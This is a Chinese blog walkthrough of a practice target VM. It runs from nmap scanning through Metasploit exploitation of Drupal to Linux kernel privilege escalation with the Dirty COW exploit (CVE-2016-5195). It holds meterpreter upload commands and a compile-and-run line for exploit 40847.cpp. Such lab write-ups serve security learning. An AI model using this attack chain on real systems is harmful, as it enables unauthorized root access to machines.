靶机实战--linux提权之SUID&脏牛(二)

  • A+
所属分类:安全文章

Author:liyue

TIME:2021-11-10

linux-脏牛

0x01、正文

上午看完了小迪安全的 linux提权操作:SUID 和脏牛提权。

linux最常用的两种提权方式之一。现在将之前学的SUID 和脏牛提权分别总结,然后结合靶场实际学习一下。

脏牛提权 属于linux 内核提权方式之一,使用于linux->web 环境下。

脏牛提权利用的漏洞版本为CVE-2016-5195,影响的系统为:

靶机实战--linux提权之SUID&脏牛(二)

使用的时候可以根据linux漏洞扫描脚本(linux-exploit-suggester-2-master)进行扫描判断。

0x02、靶场

一、信息收集

1、使用 arp -a -l 对本地ip进行扫描 ,扫描出来结果为172.20.10.2端口为靶场地址(注意配置个人网关信息)

靶机实战--linux提权之SUID&脏牛(二)

2、nmap扫描端口 发现开启22 openssh端口 并且显示系统版本ubuntu 2.7 openssh 6.6.1

这里使用的nmap -p 1-65535 172.20.10.2 开启全端口扫描

靶机实战--linux提权之SUID&脏牛(二)

3、根据这些我几句想到openssh中可能会有什么可以进行利用 或者 80端口中给出什么可以用的信息,我们先看看80端口

80端口:80给出的就是一个简单的界面,80端口放弃,不知道有什么

靶机实战--linux提权之SUID&脏牛(二)

接下来使用了目录爆破 连接不到80端口 ,马上转下一个

22端口:

openssh6.6.1 

(注意这个端口号)

1898 端口:

通过1898端口进入到drupal框架,drupal框架 由php搭建的CMS属于国外最常见的CMS之一,根据这种drupal框架,直接进入MSF漏洞库去查进行利用。

提出问题:drupal框架如何发现,drupal框架如何使用?

drupal框架:现在这个端口在1898上

启动MSF操作:

search drupal 对drupal漏洞进行查找。可以发现很多drupal的可利用漏洞。(这里在给一个小想法,如果我们不知道怎么找到合适的漏洞 ,那就看看这个网站搭建的时间)

靶机实战--linux提权之SUID&脏牛(二)

显示时间 2018/04/20 对应漏洞库中最常见的时间是 2018-03-28,直接进行利用(排查)

靶机实战--linux提权之SUID&脏牛(二)

二、上传linux探针

设置好之后,run,等待会话,会话连接上之后上传linux漏洞探针。

信息收集

1、先查看内核版本 命令:uname -a。内核版本显示为Linux 4.4.0

靶机实战--linux提权之SUID&脏牛(二)

1-2 、上传了LinEnum.sh 查看linux具体信息。

靶机实战--linux提权之SUID&脏牛(二)

漏洞探针

1、上传linux-exploit-suggester-2.pl

meterpreter > upload /tmp/linux-exploit-suggester-2.pl /tmp/1.pl[*] uploading  : /tmp/linux-exploit-suggester-2.pl -> /tmp/1.pl[*] Uploaded -1.00 B of 23.72 KiB (-0.0%): /tmp/linux-exploit-suggester-2.pl -> /tmp/1.pl[*] uploaded   : /tmp/linux-exploit-suggester-2.pl -> /tmp/1.plmeterpreter > pwd/var/www/htmlmeterpreter > cd /var/www/htmlmeterpreter > lsListing: /var/www/html

靶机实战--linux提权之SUID&脏牛(二)

靶机实战--linux提权之SUID&脏牛(二)

2、上传 linux-exploit-suggester.sh(这个版本的探针会更加详细,而且会将成功率更高的漏洞标出来)

meterpreter > upload /tmp/linux-exploit-suggester.sh /tmp/2.sh[*] uploading  : /tmp/linux-exploit-suggester.sh -> /tmp/2.sh[*] Uploaded -1.00 B of 86.81 KiB (-0.0%): /tmp/linux-exploit-suggester.sh -> /tmp/2.sh[*] uploaded   : /tmp/linux-exploit-suggester.sh -> /tmp/2.shmeterpreter > shellProcess 16106 created.Channel 4 created.ls1.pl2.shchmod +x 2.sh./2.sh

漏洞探针结果:CVE-2016-5195 linux脏牛使用

靶机实战--linux提权之SUID&脏牛(二)

三、漏洞利用

通过下载40611.c ,使用MSF上传到靶机中。上传上去之后可以查看一波。

upload /tmp/40611.c  /tmp/40611.c//上传之后进入tmp目录

靶机实战--linux提权之SUID&脏牛(二)

(漏洞利用失败) 可以看到需要使用的sudo 当然 没得用。所以放弃这个

靶机实战--linux提权之SUID&脏牛(二)

然后除此之外 小迪课程中使用的是:https://www.jianshu.com/p/df72d1ee1e3e(来自简书的文章)这里的脏牛提权第二个连接,下载dcow.cpp

网上文件中给出的是mk进行编译,但是我们这里只能使用gcc编译dcow.cpp 文件

靶机实战--linux提权之SUID&脏牛(二)

这个也不能使用,我打开源文件看了一下

靶机实战--linux提权之SUID&脏牛(二)

成功      40847.cpp的利用  成功

根据linux 漏洞探针给出的exp进行利用

靶机实战--linux提权之SUID&脏牛(二)

exp利用方式:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutilpython -c 'import pty; pty.spawn("/bin/bash")'./dcow

靶机实战--linux提权之SUID&脏牛(二)

提权成功

靶机实战--linux提权之SUID&脏牛(二)


如何领取

防止链接失效,公众号后台回复【linux提权工具】获取linux提权工具,回复【linux提权手法总结】获取linux提权pdf,回复【加群】可加入交流群一起学习。




原文始发于微信公众号(鹏组安全):靶机实战--linux提权之SUID&脏牛(二)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: